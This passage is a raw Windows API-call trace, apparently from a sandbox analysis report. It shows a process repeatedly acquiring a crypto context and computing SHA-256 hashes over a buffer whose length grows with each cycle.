dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338225d0) returned 1 [0151.127] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.127] CryptHashData (hHash=0x332b7ac0, pbData=0x32e5fa80, dwDataLen=0x1a0, dwFlags=0x0) returned 1 [0151.127] CryptGetHashParam (in: hHash=0x332b7ac0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.127] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e594e0 [0151.127] CryptGetHashParam (in: hHash=0x332b7ac0, dwParam=0x2, pbData=0x32e594e0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e594e0, pdwDataLen=0xce51c) returned 1 [0151.127] CryptDestroyHash (hHash=0x332b7ac0) returned 1 [0151.127] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0151.127] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338228d0) returned 1 [0151.127] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.127] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x1c0, dwFlags=0x0) returned 1 [0151.127] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.127] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e59240 [0151.127] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e59240, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e59240, pdwDataLen=0xce51c) returned 1 [0151.127] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.127] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0151.127] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338238d0) returned 1 [0151.128] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.128] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x1e0, dwFlags=0x0) returned 1 [0151.128] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.128] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58f40 [0151.128] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e58f40, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e58f40, pdwDataLen=0xce51c) returned 1 [0151.128] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0151.128] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0151.128] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338231d0) returned 1 [0151.129] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.129] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x200, dwFlags=0x0) returned 1 [0151.129] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.129] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e597b0 [0151.129] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e597b0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e597b0, pdwDataLen=0xce51c) returned 1 [0151.129] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.129] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0151.129] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338236d0) returned 1 [0151.129] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.129] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x220, dwFlags=0x0) returned 1 [0151.130] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.130] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e59570 [0151.130] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e59570, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e59570, pdwDataLen=0xce51c) returned 1 [0151.130] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.130] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0151.130] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338220d0) returned 1 [0151.130] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.130] CryptHashData (hHash=0x332b7820, pbData=0x32e5fa80, dwDataLen=0x240, dwFlags=0x0) returned 1 [0151.130] CryptGetHashParam (in: hHash=0x332b7820, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.130] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e59990 [0151.130] CryptGetHashParam (in: hHash=0x332b7820, dwParam=0x2, pbData=0x32e59990, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e59990, pdwDataLen=0xce51c) returned 1 [0151.130] CryptDestroyHash (hHash=0x332b7820) returned 1 [0151.130] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0151.130] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822ed0) returned 1 [0151.131] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.131] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x260, dwFlags=0x0) returned 1 [0151.131] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.131] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58f70 [0151.131] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e58f70, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e58f70, pdwDataLen=0xce51c) returned 1 [0151.131] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0151.131] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0151.131] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822ad0) returned 1 [0151.132] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.132] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x280, dwFlags=0x0) returned 1 [0151.132] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.132] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58fa0 [0151.132] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e58fa0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e58fa0, pdwDataLen=0xce51c) returned 1 [0151.132] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.132] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0151.132] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338236d0) returned 1 [0151.132] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.132] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x2a0, dwFlags=0x0) returned 1 [0151.132] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.132] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e59270 [0151.132] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e59270, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e59270, pdwDataLen=0xce51c) returned 1 [0151.133] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.133] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0151.133] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338233d0) returned 1 [0151.133] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.133] CryptHashData (hHash=0x332b77b0, pbData=0x32e5fa80, dwDataLen=0x2c0, dwFlags=0x0) returned 1 [0151.133] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.133] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e593c0 [0151.133] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x2, pbData=0x32e593c0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e593c0, pdwDataLen=0xce51c) returned 1 [0151.133] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0151.133] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0151.133] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338231d0) returned 1 [0151.134] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.134] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x2e0, dwFlags=0x0) returned 1 [0151.134] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.134] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e59840 [0151.134] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e59840, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e59840, pdwDataLen=0xce51c) returned 1 [0151.134] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.134] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0151.134] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822dd0) returned 1 [0151.134] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.135] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x300, dwFlags=0x0) returned 1 [0151.135] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.135] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e599f0 [0151.135] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e599f0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e599f0, pdwDataLen=0xce51c) returned 1 [0151.135] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0151.135] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0151.135] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338239d0) returned 1 [0151.135] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.135] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x320, dwFlags=0x0) returned 1 [0151.135] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.135] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58fd0 [0151.135] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e58fd0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e58fd0, pdwDataLen=0xce51c) returned 1 [0151.135] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0151.135] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0151.135] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338226d0) returned 1 [0151.136] CryptCreateHash (in: hProv=0x338226d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.136] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x340, dwFlags=0x0) returned 1 [0151.136] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.136] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e592d0 [0151.136] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e592d0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e592d0, pdwDataLen=0xce51c) returned 1 [0151.136] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0151.136] CryptReleaseContext (hProv=0x338226d0, dwFlags=0x0) returned 1 [0151.136] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338233d0) returned 1 [0151.137] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.137] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x360, dwFlags=0x0) returned 1 [0151.137] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.137] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e59000 [0151.137] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e59000, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e59000, pdwDataLen=0xce51c) returned 1 [0151.137] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0151.137] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0151.137] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822fd0) returned 1 [0151.138] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.138] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x380, dwFlags=0x0) returned 1 [0151.138] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.138] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e59360 [0151.138] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e59360, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e59360, pdwDataLen=0xce51c) returned 1 [0151.138] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0151.138] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0151.138] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338223d0) returned 1 [0151.138] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.138] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x3a0, dwFlags=0x0) returned 1 [0151.138] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.139] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e59390 [0151.139] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e59390, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e59390, pdwDataLen=0xce51c) returned 1 [0151.139] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.139] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0151.139] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338229d0) returned 1 [0151.139] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.139] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x3c0, dwFlags=0x0) returned 1 [0151.139] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.139] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e593f0 [0151.139] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e593f0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e593f0, pdwDataLen=0xce51c) returned 1 [0151.139] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.139] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0151.139] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338232d0) returned 1 [0151.140] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.140] CryptHashData (hHash=0x332b77b0, pbData=0x32e5fa80, dwDataLen=0x3e0, dwFlags=0x0) returned 1 [0151.140] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.140] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e59420 [0151.140] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x2, pbData=0x32e59420, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e59420, pdwDataLen=0xce51c) returned 1 [0151.140] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0151.140] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0151.140] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338231d0) returned 1 [0151.141] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.141] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x400, dwFlags=0x0) returned 1 [0151.141] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.141] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e59450 [0151.141] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e59450, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e59450, pdwDataLen=0xce51c) returned 1 [0151.141] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.141] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0151.141] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338238d0) returned 1 [0151.141] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.141] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x420, dwFlags=0x0) returned 1 [0151.141] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.141] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e595a0 [0151.141] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e595a0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e595a0, pdwDataLen=0xce51c) returned 1 [0151.141] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.142] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0151.142] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338239d0) returned 1 [0151.142] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.142] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x440, dwFlags=0x0) returned 1 [0151.142] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.142] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e595d0 [0151.142] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e595d0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e595d0, pdwDataLen=0xce51c) returned 1 [0151.142] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.142] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0151.142] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338232d0) returned 1 [0151.143] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.143] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x460, dwFlags=0x0) returned 1 [0151.143] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.143] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57b80 [0151.143] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e57b80, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e57b80, pdwDataLen=0xce51c) returned 1 [0151.143] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.143] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0151.143] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338239d0) returned 1 [0151.143] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.143] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x480, dwFlags=0x0) returned 1 [0151.143] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.143] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e63cb0 [0151.144] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e63cb0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e63cb0, pdwDataLen=0xce51c) returned 1 [0151.144] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.144] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0151.144] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822bd0) returned 1 [0151.144] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.144] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x4a0, dwFlags=0x0) returned 1 [0151.144] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.144] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e63ef0 [0151.144] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e63ef0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e63ef0, pdwDataLen=0xce51c) returned 1 [0151.144] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.144] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0151.144] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338234d0) returned 1 [0151.145] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.145] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x4c0, dwFlags=0x0) returned 1 [0151.145] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.145] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e64070 [0151.145] 